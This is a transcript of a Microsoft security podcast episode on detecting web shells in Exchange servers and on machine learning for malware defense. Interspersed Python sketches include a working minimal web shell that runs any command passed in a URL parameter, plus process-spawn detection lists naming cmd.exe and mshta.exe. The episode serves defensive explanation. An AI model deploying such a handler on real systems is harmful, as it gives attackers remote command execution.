Security Unlocked 10.14.20
Ep 3 | 10.14.20

Protecting the Under-Secured With Bad Behavior

Transcript

Nic Fillingham: Hello and welcome to Security Unlocked, a new podcast from Microsoft, where we unlock insights from the latest in news and research from across Microsoft's security engineering and operations teams. I'm Nic Fillingham.

Natalia Godyla: And I'm Natalia Godyla. In each episode, we'll discuss the latest stories from Microsoft security, deep dive into the newest threat intel, research, and data science.

Nic Fillingham: And we'll follow some of the fascinating people working on artificial intelligence in Microsoft security. If you enjoy the podcast, have a request for a topic you'd like covered, or have some feedback on how we can make the podcast better.

Natalia Godyla: Please contact us at securityunlocked@microsoft.com, or via Microsoft security on Twitter. We'd love to hear from you.

Nic Fillingham: Hello listeners, welcome to the third episode of Security Unlocked. And hello to you, Natalia. It is October. The leaves are turning. It is the time of year of candy corn and high fructose corn syrup. I know you love October.

Natalia Godyla: I do. I am all in for pumpkin spice lattes and cyber security awareness month.

Nic Fillingham: A match made in heaven. If they reformed the Spice Girls, you should audition to be the sixth girl called Pumpkin Spice.

Natalia Godyla: Two out of 10 on that joke.

Nic Fillingham: Two out of 10? I thought it was pretty good. Anyway. Cyber security awareness month, is that a Microsoft thing? Is that an industry thing? What's all that about?

Natalia Godyla: It's an industry thing, but Microsoft is definitely invested in doing their part during this month. So it's really exciting to see everyone empowering the cyber security world to get the word out, which is what we do on this podcast too.

Nic Fillingham: Exactly right. I was just going to say, Security Unlocked, the podcast. Every episode, we're about helping spread the word of the importance of cyber security and helping empower our listeners with more information about how all this stuff works.

Natalia Godyla: Yeah. I'm excited for this episode. We've got a great lineup.

Nic Fillingham: First up, we talk to Hardik Suri on the importance of keeping servers up-to-date. But more importantly, or more specifically, how he and his team are working on behavior-based monitoring to protect what are sometimes referred to as under-secured or under-protected servers.

Natalia Godyla: Yeah. And we talk to Dr. Karen Lavi about her background and how she came to cyber security through a really interesting journey. She's been a medic. She's been in the Israeli Defense Forces. All with the intent of just doing good, and she'll talk to us about her perceptions of AI and how neuroscience and the rest of her background connect to cyber security.

Nic Fillingham: It is a great conversation. It's a great episode. I hope you'll enjoy it. Let's get on with the pod.

Nic Fillingham: Hardik Suri, welcome to the Security Unlocked Podcast. Thanks for joining us.

Hardik Suri: Thank you for having me.

Nic Fillingham: Could you start by just introducing yourself, telling us about your role at Microsoft, and what you do day-to-day?

Hardik Suri: Sure. I work as a senior security researcher with the Microsoft Defender ATP research team. I'm currently based in Vancouver, and my daily responsibility is getting up to speed on all the latest threats which are out there, and checking which ones are impacting Microsoft products. And if they are, how to durably detect and protect against these latest advanced attacks. Anything which touches the endpoints would be under our radar. It could be exploits, it could be malware, it could be an email with an attachment that, when the user clicks, downloads itself and does all those funny things. So any suspicious or malicious activities happening on the endpoint, we get visibility into through the product, and then we try to see how we can detect that and prevent it from being abused any further.

Natalia Godyla: So your research process starts with the signals coming from the product? And then, when you find something that is suspicious or interesting that is your jumping off point to dig in further?

Hardik Suri: Mm-hmm (affirmative). There are two ways. Either we proactively go and find things and then we come back and see if we've got something in telemetry. Or if telemetry can give us something interesting, and then from there we can pivot and find what really happened.

Nic Fillingham: Hardik, you authored a blog post in June called Defending Exchange Servers Under Attack, which we'd love to talk about. Could you walk us through what you discovered and how you addressed it in this June 24 blog?

Hardik Suri: How it all started was we had telemetry on a piece of code called web shells on these Exchange servers. Web shells are nothing but a comparatively small piece of code which attackers can install on these servers and then use to control the Exchange server, in terms of running commands, or dropping more binaries, or moving laterally. So that piece of code on the servers is critical to the attacker. And if we find any instance of that piece of code, we know that the server is already compromised and the attacker is already operating on that server. That was the starting point, and then when we look at the server in detail, we can see all the actions the attacker did.

Hardik Suri: Whether it was doing reconnaissance activity, that is, trying to enumerate the entire organization and its users and finding which critical accounts to target, or dumping credentials, because if the attacker can get credentials, they can move laterally in the organization and impact or infect more machines. So that was the starting point, where we see a web shell installation. That's very alarming for us, and then we would deep dive and see everything the attacker did.

Natalia Godyla: Were there challenges in detecting this threat?

Hardik Suri: Yes. It's not your typical endpoint infection. When we say these servers are getting compromised, these servers already have a lot of built-in tools which attackers can abuse. So they don't really have to bring their own tools, which can be easily detected. If they're using existing tools and scripts, which are used by admins, then the traditional problem arises: how do you detect whether this is activity done by an admin of the server or an attacker doing the activity?

Hardik Suri: So the whole challenge was to separate out the clean activity, or the noise, and just focus on the malicious part, what the attacker did.

Nic Fillingham: I wanted to ask about web shells. You talked about them being relatively small pieces of code. Let's just explain that a little bit. A web shell is a piece of code that exposes the shell of the system to the web, is that accurate?

Hardik Suri: Yes. How this works is a web shell is nothing but a small piece of code which exposes functionality to execute code on the endpoint. How you would install a web shell is that these Exchange servers have folders which are accessible over the internet. So if you can drop that piece of script there and visit that URL, you can control that script, and you can pass the command you want to execute as part of the HTTP URL, or it could be part of the cookies or any HTTP section. And internally, the listening script would get that piece and then execute it on the server. So how the process tree looks is that the Exchange server, the instance of the Exchange server, is actually executing these commands on behalf of the attacker.
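
To make the mechanism Hardik describes concrete, here is a deliberately minimal, illustrative sketch in Python of what a web shell boils down to: a script in a web-accessible folder that takes a command from an HTTP request and runs it under the web server's own identity. This is not code from the actual attacks, and real web shells on Exchange are typically ASPX files rather than Python; the point is only the shape of the mechanism.

```python
# Illustrative only: the essence of a web shell as described above.
# A tiny handler reads a command from a query parameter and runs it, so every
# command the attacker sends executes as a child of the web server process.
import subprocess
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class WebShellHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        params = parse_qs(urlparse(self.path).query)
        cmd = params.get("cmd", [""])[0]              # attacker-supplied command
        result = subprocess.run(cmd, shell=True,      # runs as the server's identity
                                capture_output=True, text=True)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(result.stdout.encode())

# HTTPServer(("127.0.0.1", 8080), WebShellHandler).serve_forever()  # illustration only
```

Notice what this produces on the host: every attacker command shows up as a child of the web server process, which is exactly the process-tree signal the behavior-based detections discussed next rely on.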

Natalia Godyla: How are we evolving our techniques for detecting and blocking, especially when it comes to evasive technologies like web shells that evade file-based protections?

Hardik Suri: File-based protections would not be a durable, long-term solution for this. So what we did was we started profiling the behavior activity of these Exchange servers, and understanding the clean activities, or clean behaviors, you would see on an Exchange server, which helped us in eliminating the noise we were seeing in these attacks. Microsoft Defender has this powerful behavior component where it can inspect the behaviors initiating from these Exchange processes. And then we can see what kind of activities these are doing.

Hardik Suri: And based on that, we can, with some confidence, say whether it's compromised based on what it's trying to spawn. Let me give you an example. If an Exchange server is trying to spawn CMD.EXE, or MSHTA.EXE, or these known suspicious system files, then it's highly likely that it's been compromised and there's a web shell on the server.
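
Here is a minimal sketch, in Python, of the kind of parent/child process heuristic Hardik is describing. The event fields and the exact lists of worker processes and suspicious children are assumptions for illustration; Defender's real behavior engine is far richer than a simple lookup like this.

```python
# A toy parent/child spawn heuristic. Field names and process lists are illustrative.
EXCHANGE_WORKERS = {"w3wp.exe", "umworkerprocess.exe"}        # example Exchange/IIS worker processes
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "mshta.exe"}

def is_suspicious_spawn(event: dict) -> bool:
    """Flag an Exchange worker process spawning a commonly abused system binary."""
    parent = event.get("parent_process", "").lower()
    child = event.get("child_process", "").lower()
    return parent in EXCHANGE_WORKERS and child in SUSPICIOUS_CHILDREN

# Example: a web shell running a command under the IIS worker process hosting Exchange
print(is_suspicious_spawn({"parent_process": "w3wp.exe", "child_process": "cmd.exe"}))  # True
```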

Nic Fillingham: And are these behavior detections, are they rule based, or are they a bit more dynamic? Are they taking into account other factors and maybe more machine learning based determinations?

Hardik Suri: Mm-hmm (affirmative). Yeah. They are very generic in nature. And we do take input from machine learning. All these behavior patterns are getting fed into the cloud behavior machine learning models. What that gives us is that the machine learning model can then provide blocking verdicts to these endpoints, where even if the endpoint behavior component is missing something, the machine learning can catch that based on its intelligence, and still block the attacks.

Hardik Suri: We have this pattern technology, where these behavior patterns we just collected from the endpoint get fed to the machine learning. And the machine learning is getting more intelligent and can actually block future attacks.
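
As a rough illustration of the pipeline Hardik outlines, the sketch below turns behavior patterns into binary features and trains a small classifier that can hand back a block/allow verdict. The feature names, training rows, and model choice are all invented for the example; they are not Defender's actual features or model.

```python
# Behavior patterns observed on endpoints become features for a cloud-side classifier.
# Feature names and training data are made up for illustration.
from sklearn.ensemble import GradientBoostingClassifier

FEATURES = ["spawned_cmd", "spawned_mshta", "dumped_lsass", "wrote_script_to_webroot"]

X_train = [          # 1 = behavior observed for the process, 0 = not observed
    [1, 0, 1, 1],    # web-shell-like activity
    [0, 0, 0, 0],    # routine admin activity
    [1, 1, 0, 1],    # more malicious activity
    [0, 0, 0, 0],    # benign
]
y_train = [1, 0, 1, 0]   # 1 = malicious, 0 = clean

model = GradientBoostingClassifier().fit(X_train, y_train)

def cloud_verdict(behavior_vector):
    """Return 'block' when the model scores the behavior pattern as malicious."""
    return "block" if model.predict([behavior_vector])[0] == 1 else "allow"

print(cloud_verdict([1, 0, 0, 1]))  # likely 'block' given this toy training set
```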

Natalia Godyla: What do you recommend security practitioners do in order to protect against the exchange server attacks?

Hardik Suri: Sure, yeah. The first thing, the most common one, is to apply patches. These machines are very critical to the business; it's a common saying that if the Exchange server goes down, the business goes down. So applying the latest security patches is the top priority for admins. The reason for this is that we are finding

Hardik Suri: ... a lot of vulnerabilities in Exchange servers which can be exploited and which can allow the attackers to land on these Exchange servers directly, which is game over for the organization. So, being proactive in applying patches is certainly the topmost priority. Second, keep the security solutions up to date. Don't turn off your antivirus, your firewalls, your network protections; keep them on and keep them updated.

Hardik Suri: There has been a myth where admins would disable the security products so that they don't interfere with critical workloads. But what is required here is a more intelligent understanding of which settings to turn on and which settings to turn off if they are actually interfering. So, outright turning off the security solutions is not recommended and would open the door for more exploitation. Also, restrict access and follow something called the principle of least privilege, along with credential hygiene. Keep all privileges at the lowest level, and grant elevated privileges only where they are really required. Avoid reusing highly critical credentials across machines.

Hardik Suri: And finally, prioritize alerts, I'll say. Since all organizations have some sort of central logging capability where they can see all the alerts coming in, any alert from a server should be considered high priority and should be investigated thoroughly. This would help in limiting the impact, because from my experience, from the time the attackers come into the system, they would spend days just doing reconnaissance. They would not jump into executing things. They would just be there, enumerate the users, and try to understand the environment. That would take days, and if we can identify and detect and block them at that stage, that would really limit the harm they can cause.

Nic Fillingham: So, moving forward, is some of the work that you've done here and talk about in this blog actually going to help customers that have Exchange servers where they haven't applied the latest security updates, or have turned off or greatly minimized some of the security features? Is some of this behavior monitoring that you talk about in the blog an additional layer of protection?

Hardik Suri: Oh yes. That's an additional layer, I'll say. And a more durable layer. The attacks on Exchange servers are very different from attacks on endpoints: you would not see the attackers bringing their own malicious binaries, which would get detected by the antivirus software. They will generally rely on the tools which are already there on these Exchange servers.

Hardik Suri: For example, if they land on Exchange servers, one of the things they would want to do is dump the emails, because the servers are known for containing all the organization's emails. For dumping and exfiltrating these emails, they don't really have to bring any tool of their own. There are commands already installed on these servers where they can just run them and get all the emails.

Hardik Suri: So, while the file-based or traditional antivirus solutions may not detect these attempts, the behavior components can surely detect this, where you would see email getting dumped, then getting zipped, and then getting exfiltrated. All these different events we can correlate together and piece a picture together where this could potentially be an exfiltration of corporate emails. So, that adds a lot of value and a lot of protection.
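
The correlation Hardik describes (dump, then compress, then exfiltrate) can be pictured with a toy example like the one below. The event shapes, stage names, and time window are hypothetical; the idea is simply that individually unremarkable events become a high-severity signal once they line up.

```python
# A simplified correlation of separate behavior events into one possible
# email-exfiltration incident. Event shapes and stage names are illustrative.
from datetime import datetime, timedelta

EXFIL_STAGES = ["mailbox_export", "archive_created", "outbound_transfer"]

def correlate_exfiltration(events, window=timedelta(hours=6)):
    """Return True if all exfiltration stages occur within the time window."""
    by_stage = {}
    for event in events:
        if event["stage"] in EXFIL_STAGES:
            by_stage.setdefault(event["stage"], []).append(event["time"])
    if not all(stage in by_stage for stage in EXFIL_STAGES):
        return False
    start = min(min(times) for times in by_stage.values())
    end = max(max(times) for times in by_stage.values())
    return end - start <= window

events = [
    {"stage": "mailbox_export", "time": datetime(2020, 6, 1, 2, 0)},
    {"stage": "archive_created", "time": datetime(2020, 6, 1, 2, 15)},
    {"stage": "outbound_transfer", "time": datetime(2020, 6, 1, 3, 0)},
]
print(correlate_exfiltration(events))  # True: worth raising a high-severity alert
```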

Natalia Godyla: And what's next for the behavior-based blocking? I recall in the blog, you had outlined that there are ways in which the threat actors are starting to evade our detections. So, one example that you gave was Mimikatz. Mimikatz could be blocked, but there's a different way that they could leverage Mimikatz, or wrap the program, in order to get past our detections again. So, I'm sure it's like a cat and mouse game where you're continuing to evolve the product while they're continuing to evolve their techniques. So, what's next?

Hardik Suri: More investment on these servers is something in the pipeline. Like you rightly mentioned, attackers would always play a cat and mouse game with files, where we would detect something, they would modify it, and then we stop detecting it. That's where the behavior component is so important. The cost of changing a behavior is much higher. A behavior translates to a technique. So the effort for an attacker to create or use a new technique costs much more than simply wrapping a binary or adding or removing some bytes to evade the protection. The whole point is how to increase the cost for an attacker to execute an attack. And we sit at a more generic layer, so while they might evade file-based detections, for them to really evade us completely, they would have to create a new attack from scratch, which we have seen the attackers won't do. They would generally want to reuse whatever they have created on different organizations.

Hardik Suri: So, the behavior component will always be a much more durable way of protecting customers, I'll say.

Nic Fillingham: Hardik, was there an ah-ha moment for you and or your colleagues when you were going through this process? Did a particular piece of data or telemetry allow you to see the big picture in a dramatic way or was it a slow drip?

Hardik Suri: Well, it was a slow drip, I'll say, because, like I said, it's not a typical endpoint detection where the whole detection is over in a few seconds or minutes. These attackers are in your organization for weeks and months before they start doing anything malicious. So we need to be patient, and we need to be watching them all the time and lay traps for them, so if they do something, we get telemetry and we block them outright.

Hardik Suri: Well, the ah-ha moment was when they were trying to abuse this thing called the Exchange Management Shell. That's a very critical piece of the platform, which admins use to maintain the Exchange servers, and a few of its actions could be exporting mailbox emails or migrating them. We could see the attackers doing your typical activity of reconnaissance and credential dumping, but the moment we saw the attackers going after the Exchange Management Shell and trying to dump the emails, that was the point we could really understand the motive of the attackers, and we could also see what kind of emails they were looking for. They were searching for specific subjects. They were searching for certain strings in the body. So we could really understand the mindset of the attackers and what they were actually after.
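
One way to picture catching this kind of Exchange Management Shell abuse is to watch for mailbox-export style cmdlets being run by accounts that do not normally run them. The sketch below uses real Exchange cmdlet names as examples of export operations, but the log format and the allow-list of expected operator accounts are hypothetical.

```python
# Flag export-style cmdlets run by unexpected accounts. The allow-list and the
# log-entry shape are hypothetical; the cmdlet names are examples of export operations.
EXPORT_CMDLETS = {"new-mailboxexportrequest", "search-mailbox"}
EXPECTED_OPERATORS = {"svc-backup", "exch-admin01"}   # hypothetical known-good accounts

def flag_suspicious_exports(log_entries):
    """Yield entries where an export-style cmdlet is run by an unexpected account."""
    for entry in log_entries:
        if (entry["cmdlet"].lower() in EXPORT_CMDLETS
                and entry["user"].lower() not in EXPECTED_OPERATORS):
            yield entry

logs = [
    {"user": "exch-admin01", "cmdlet": "New-MailboxExportRequest"},  # routine admin work
    {"user": "webapp-pool",  "cmdlet": "New-MailboxExportRequest"},  # suspicious
]
print(list(flag_suspicious_exports(logs)))  # only the second entry is flagged
```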

Natalia Godyla: So, what was the end result of the attacks then? So, they exfiltrated credentials as a result; what did they do with them?

Hardik Suri: So, they were really after the corporate data, or the content in those emails, and they were putting all their effort into how they could dump and exfiltrate it, because the Exchange servers would contain all the critical information, and emails would be one source of it. We did see them moving to other machines where they could find more information, but if we keep focused on the Exchange servers, the emails were what they were after.

Natalia Godyla: Was this with the goal of selling this data or compiling a large dataset to use for other malicious intent?

Hardik Suri: These are really advanced attackers. So, these attackers would generally use this kind of information to gain more information on the organization. It could be your typical corporate espionage cases or IP theft cases, where they would want to collect all the IP, the intellectual property, of an organization. We are not sure at this point how they use that data, but that seemed like the intention based on the strings they were searching for inside the emails.

Nic Fillingham: The behavior modeling that's happening on the Exchange server and then the machine learning that's up in the cloud, can any of those learnings, those behaviors, flow into other models to help protect other servers that are open to the web? I'm wondering if some of the work you've done here is going to filter out and benefit other products and services?

Hardik Suri: Oh yeah. Certainly. So, the ML model is quite generic and it doesn't really serve Exchange servers only. It provides protection for all the endpoints. So, if we detect something on one endpoint and that same technique is used on Exchange servers, if the cloud already has that information, it can outright block that.

Hardik Suri: So, it kind of collects everything and doesn't really differentiate between what endpoint that is. Malicious is malicious; it doesn't really matter if it's on an Exchange server or an endpoint.

Nic Fillingham: Hardik, what do you do when you're not a security researcher? What do you do for fun?

Hardik Suri: So, I'm a musician. I play the guitar. Back home I had a rock band, which I was part of. So yeah, music, I'll say.

Nic Fillingham: What kind of music did you play? You said a rock band but who would you align yourself with musically?

Hardik Suri: So, we were a rock band and my influences would be your typical classic rock, Led Zeppelin, Deep Purple. In modern rock, I'll say Tool and Dream Theater. Progressive stuff, I like that.

Nic Fillingham: What was the name of your band?

Hardik Suri: It was called Twisted Flyover. It was named after a flyover. When my coworker used to come to my place, he had to cross a flyover, and that flyover had a lot of circles, so he was kind of confused; there were different exits. He always used to take the wrong exit, and he once said, "Man, this flyover is so twisted," and that's how we came up with the name.

Nic Fillingham: Nice. And it's not an homage to Twisted Sister?

Hardik Suri: Oh no, it's not.

Nic Fillingham: Awesome. Well, Hardik, thank you so much for your time. Thanks for doing great work. We look forward to more updates from you on the security blog in the future.

Hardik Suri: Thank you. Thank you for having me. I had a good time.

Natalia Godyla: And now let's meet an expert in the Microsoft security team to learn more about the diverse backgrounds and experiences of the humans creating AI and tech at Microsoft.

Natalia Godyla: Hi, Karen, welcome to the show.

Dr. Karen Lavi: Hey, thanks for having me.

Natalia Godyla: Well, we're going to kick it off by just setting the stage a bit. It would be great to hear what's your current role at Microsoft and what does your day to day look like?

Dr. Karen Lavi: I am a senior data science lead in the Microsoft Defender research group. I'm part of the cyber security AI team, which means that our team consists of researchers and data scientists working to tackle problems related to security and protect our customers using the muscle of machine learning and data science.

Natalia Godyla: Could you talk a little bit more about the makeup of the teams? How many people are on the team? What kind of backgrounds do they have?

Dr. Karen Lavi: So my team is currently five people, including myself. We're coming from completely different backgrounds and actually completely different nationalities as well, which is pretty nice because each one of us brings something very different culturally and technically to the team. We have someone with a background in robotics, someone that was in the Navy working on sonars, someone with a statistics background, and someone that has been at Microsoft for many, many years in different roles, so they bring all the aspects of the business into it.

Nic Fillingham: And Karen, how about your path to Microsoft? How did you get to Microsoft? What interesting entries would we see on your LinkedIn profile?

Dr. Karen Lavi: So I think that if you looked at my LinkedIn profile, you wouldn't understand, first of all, what I am, and second, where I'm from, because there are so many different entries. I'm a data scientist, a programmer, a security consultant, a neuroscientist, a medic, and I coach girls to code. So I think those are the main things that you would see on my LinkedIn. I joined Microsoft two years ago. Joining Microsoft was my return to the security field after a few years in academia. Before I was in Microsoft in this role, I was a data scientist in academia; that was after I did my PhD in computational neuroscience in Switzerland, so I've also been moving between states and countries and roles. Before I was doing my PhD in neuroscience, I was in the security field, in the Israeli Defense Forces, as a pen tester. At that time, I was also doing my BA in psychology. And before that, and also during this time, I was volunteering as a medic. So quite a way until I got here today.

Nic Fillingham: That's a fascinating resume. How did you find yourself going from the sort of paramedic world, into psychology, into neuroscience, and then here to Microsoft in AI? Was there a catalyst that spurred each of those changes or was it sort of organic?

Dr. Karen Lavi: I think the main thing that is associated with all of those different things that I did is my burning need to impact as many people as possible and to help people, and every time it's coming from a different aspect. In the beginning, it was from the medical aspect, and then protecting applications against bad actors. And then I wanted to do research and help by combining the medical side with the data, but academia didn't give me exactly what I wanted, because it was indeed helping mankind by progressing science, but I wanted to see the impact of what I'm doing. And that's what I found in Microsoft, which is using my computational skills to protect our customers against bad actors.

Nic Fillingham: You just mentioned taking the sort of medic part and marrying that with data. Can you expand a bit on what that means?

Dr. Karen Lavi: Actually, it's very interesting, because in what we're doing, and that's the reason that we're using AI and machine learning, we're trying to protect patient zero in the security world. When someone is getting hit by malware, it's very easy then, once you know it, to block it. But we need to use AI in order to predict it and protect against it before we even know that this is malware, to be able to generalize before we've ever seen it, and to protect the first person that is going to potentially be attacked by this malware.

Nic Fillingham: And that's patient zero.

Dr. Karen Lavi: And that's our patient zero. So it's like predicting that this disease is going to come or that this disease is going to affect that person before it's actually happening.

Dr. Karen Lavi: So besides the fact that being a medic and wanting to protect patients is very similar to what we do, protecting our customers against malware, there are also some similarities with when I was working on the other side of being a medic, helping the medics and the firefighters know which cases to send ambulances to. There are very limited resources in each city in terms of the ambulances that can be sent to incidents. And when someone is calling 911, that decision of whether to send an ambulance or not is very crucial, because if you're not sending it, then the person might not get the treatment that they need. But if you are sending it to something where they may not have actually needed you to come, then you're wasting your resource.

Dr. Karen Lavi: In my previous role, in Data Science for Social Good, we built a machine learning model that tried to predict in real time whether an incident would require an ambulance or not.

Dr. Karen Lavi: We've done something similar recently in my team. For our enterprise customers, the product that we give them produces alerts, and they need to respond to those alerts. The security operator is sitting there and going through those alerts. Now, for some of those things, we might give them the alert, but it's not as crucial. And if we waste their time looking at it and trying to understand what it is, they might then not invest the time in something else that is more important. We know the amount of time that they have, and we are trying to prioritize which alerts they should give their attention to.
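
A minimal sketch of that prioritization idea, assuming a hypothetical severity score already exists for each alert along with a rough per-alert triage time: rank the alerts, then keep the ones an analyst can realistically get through in the time available. A real system would be considerably more sophisticated than this greedy cut-off.

```python
# Rank alerts by predicted severity and trim to the analyst's time budget.
# Scores and triage-time estimates are invented for illustration.
def prioritize_alerts(alerts, minutes_available):
    ranked = sorted(alerts, key=lambda a: a["predicted_severity"], reverse=True)
    chosen, used = [], 0
    for alert in ranked:
        if used + alert["triage_minutes"] <= minutes_available:
            chosen.append(alert)
            used += alert["triage_minutes"]
    return chosen

alerts = [
    {"id": "A1", "predicted_severity": 0.95, "triage_minutes": 30},  # e.g. a server alert
    {"id": "A2", "predicted_severity": 0.40, "triage_minutes": 15},
    {"id": "A3", "predicted_severity": 0.80, "triage_minutes": 45},
]
print([a["id"] for a in prioritize_alerts(alerts, minutes_available=60)])  # ['A1', 'A2']
```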

Natalia Godyla: So what other experiences do you bring from your history to this current role? I know we talked a little bit about your experiences as a medic, but you also have that interesting diversion into computational neuroscience. So how does that play into your current role today?

Dr. Karen Lavi: Besides the fact that in my computational neuroscience work I learned a lot about neural networks and machine learning, which are models that can be transferred and used to classify between malware and clean files, I think the main thing is that neuroscience is an interdisciplinary field, and the same is true of security. Security is a huge umbrella over all those sub-topics. And the same way that there is no single specialty of neuroscience, and everyone comes with a different toolkit to investigate a common problem, that's what I do in my team. My team consists of people from different backgrounds, and each one comes with their specialty. We have someone that is an expert in statistics, someone that is an expert in security, someone that is an expert in reverse engineering, someone that is an expert in reinforcement learning. And we're all bringing our toolkits together to solve that big problem that we're facing. If we just came with one approach, we might miss all of those other opportunities that we have to solve the problem. But together, it's like a non-linear summation of our powers.

Natalia Godyla: If you are looking at each individual bringing a specific toolkit to the team, do you normally sit back and think, okay, well, I definitely need an expert in, like you said, statistics or an expert in a specific model and then you look to build a team based on filling all of those gaps across the individuals?

Dr. Karen Lavi: That's an amazing question, because this is actually something that is very dear to my heart. I believe that diversity is not just the regular way that we define diversity, which is bringing in more women and different ethnicities. It's also about the different backgrounds. And the thing that I am looking for the most when I'm looking to add someone new to the team, I sometimes would not know how to define, because the biggest problem is knowing what you don't know.

Dr. Karen Lavi: So what I'm looking for is someone that is just surprising me, someone that is thinking differently than me. And I'll give you an example. I had interviewed someone and asked them to solve a problem that we give to everyone. And the way that he solved that problem was something that I did not understand, so I hired him, because if I don't understand it, and that's something that he understands, that's a unique talent that we can bring to our team, a unique approach that we don't have until now. And bringing someone that is looking at it from a different point of view is better than bringing someone that thinks exactly like us. This is actually a bias that, when we are talking about hiring, one should be really careful about: just recruiting mini-mes, other people that would do things exactly the way I'm doing them, because then we're not going to be able to actually scale and expand. We're just going to solve things the exact same way.

Natalia Godyla: That's awesome. I love the way you think about innovation consistently, having it in mind. Just sticking with the philosophical level of questioning, when we talk about AI and ML and how you use it in your current role, what does AI and ML mean to you in general, in the big meta sense?

Dr. Karen Lavi: The one thing that is really important for me, whenever I talk to someone that is not an expert in AI and ML,

Dr. Karen Lavi: ... is to explain that this is not magic. It's not going to solve a problem that is not solvable. But what it can do is take our domain expertise and scale it in a way that a human by themselves cannot, and that's the computational power. So I'll give you an example. When we're talking about the anti-malware product, Defender, the one that I'm working on, we want to be able to identify malware, and we need to predict. For me that means predicting, when we are seeing something for the first time, whether this is going to be a malware file or not.

Dr. Karen Lavi: And AI and ML for me is taking all of our knowledge, all of the domain expertise from before, and all of the samples that we have gathered through the years, understanding which attributes associate a file with malware and which do not, and building something that is able to learn from that past experience and predict, when it first sees something completely new, whether this is malware or not.

Dr. Karen Lavi: If we had someone that had a super mind and remembered everything and was able to access it in femtoseconds, then that person for me would be an AI. But because that ability doesn't exist for us yet, we have to use computers for it, and that's what machine learning and AI are doing for us. They're bridging the gap that our brain cannot.
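
To ground the "patient zero" idea in something concrete, here is a tiny sketch of training a classifier on attributes of files we have already labeled and then scoring a file nobody has seen before. The features, values, and labels are all invented; real feature engineering and training sets are vastly larger.

```python
# Learn from attributes of known clean/malicious files, then predict on a new file.
# Feature columns: [file_size_kb, is_signed, imports_crypto_api, section_entropy]
from sklearn.ensemble import RandomForestClassifier

X_train = [
    [120, 1, 0, 3.1],   # signed utility, low entropy            -> clean
    [450, 0, 1, 7.8],   # unsigned, crypto imports, high entropy -> malware
    [80,  1, 0, 2.9],   #                                        -> clean
    [300, 0, 1, 7.5],   #                                        -> malware
]
y_train = [0, 1, 0, 1]

clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X_train, y_train)

# A brand-new file no one has ever seen: the model generalizes from past attributes.
never_seen_file = [[390, 0, 1, 7.9]]
print("malware" if clf.predict(never_seen_file)[0] == 1 else "clean")
```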

Natalia Godyla: Yeah, until we have the magic pill for it, right?

Dr. Karen Lavi: Yeah.

Nic Fillingham: Karen you mentioned AI and ML and we've used that term as well in sort of posing these questions to you. They're very broad, they're very amorphous. What are some of the techniques that your team utilize or are developing?

Nic Fillingham: We hear about neural networks and deep learning and fuzzing and all these other, I think, more specific sorts of concepts. And one's probably a subset of the other, but what are some of the most useful techniques that your team utilizes in the work that you do?

Dr. Karen Lavi: A lot of the things that we are using have to work online and have to be very fast. Currently the computational power does not allow us to do all of those deep learning methods. So when we're talking about those snap decisions, those have to be more lightweight models, like random forests and linear classifiers. This is for all of our online decision making.

Dr. Karen Lavi: So, mainly the tools that we're using are those ML classifiers for classification. We're also using a lot of clustering and a lot of unsupervised methods in the backend to understand, for example, that a new file is a version of polymorphic malware, which means it's a file that they just changed a bit. It's still the same malware, but they just try to trick us. So we're trying all the time to use new techniques, bringing new techniques from academia back to our product, because it is a game that we're playing with the bad actors. They're trying to find new ways to trick us, and we're trying to find new ways to understand that what they're sending is malware. So we have to innovate and be on top of our game all the time. So the methods are changing all the time.

Dr. Karen Lavi: But the one thing that is super important is our ability to understand our data, to see trends, to identify anomalies. That's something that big data and data science allow us to do, and it's really important in this case.
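
The unsupervised side Karen mentions can be pictured with a small clustering sketch: if a polymorphic variant only changes a few bytes, its feature vector should land next to the original sample. The feature vectors and clustering parameters below are invented for illustration; production pipelines use far richer features.

```python
# Cluster per-file feature vectors so slightly tweaked variants group with the original.
import numpy as np
from sklearn.cluster import DBSCAN

features = np.array([
    [7.8, 450, 1, 0],   # known malware family sample
    [7.7, 455, 1, 0],   # polymorphic variant (a few bytes changed)
    [7.9, 448, 1, 0],   # another variant
    [3.0, 120, 0, 1],   # unrelated clean file
])

labels = DBSCAN(eps=10.0, min_samples=2).fit_predict(features)
print(labels)  # the three variants share a cluster label; the clean file is noise (-1)
```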

Nic Fillingham: What are some of the, sort of, time constraints that you work with?

Nic Fillingham: I mean, so let's say I'm working at my PC and I get an email with a file attached to it and I go to double click it and the Defender service somehow looks at that file and I guess sends some metadata up into the Cloud and it comes back with a determination. I mean, that's happening in a blink of an eye, is it two blinks of an eye? What's the... This is a very short period of time that you're doing a lot of extremely complex stuff. How do you think about that? Are you working in nanoseconds, microseconds, milliseconds?

Dr. Karen Lavi: So, that's a great question. There are a lot of very cutting-edge AI and ML technologies that are just currently taking too much time because the hardware is not advanced enough, and we cannot allow ourselves to use them in an online situation, because we're talking here about prediction. When you're downloading a file, if it's going to take us a minute to give you an answer back on whether this is malware or benign, you're not going to use our product. It's just going to be too much disturbance to you, and it would just not be acceptable; you would rather pay the price of being attacked with malware once a year.

Dr. Karen Lavi: So our answer has to come really fast, and it's a matter of milliseconds for us, which means that we have to make a snap judgment on the client, and if we cannot make it, we need to send some of the metadata to the cloud and then bring back the answer, because we lock the file at that moment and you cannot work. So it has to be milliseconds. And that's, again, like being a medic: you want to take care of patient zero, but you also don't want to do any harm, and doing harm in this case is disturbing the customers.
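
Here is a hedged sketch of that tiered decision: a lightweight local model makes the snap judgment, and only when it is unsure (and the latency budget allows) does the client hold the file and ask a heavier cloud model. The thresholds, timings, stand-in models, and the fail-open fallback are all illustrative assumptions, not how Defender actually behaves.

```python
# Tiered local-then-cloud verdict under a millisecond budget. Everything here,
# including the fallback policy, is an illustrative assumption.
import time

def local_score(file_features) -> float:
    """Stand-in for a fast on-client model (e.g. a small linear classifier)."""
    return 0.55   # pretend score: neither clearly clean nor clearly malicious

def cloud_score(file_metadata) -> float:
    """Stand-in for a heavier cloud-side model consulted on uncertain cases."""
    return 0.92

def verdict(file_features, file_metadata, budget_ms=50):
    start = time.perf_counter()
    score = local_score(file_features)
    if score < 0.2:
        return "allow"   # confidently clean: release the file immediately
    if score > 0.8:
        return "block"   # confidently malicious: block immediately
    elapsed_ms = (time.perf_counter() - start) * 1000
    if elapsed_ms < budget_ms:
        # Still within budget: keep the file locked briefly and ask the cloud.
        return "block" if cloud_score(file_metadata) > 0.8 else "allow"
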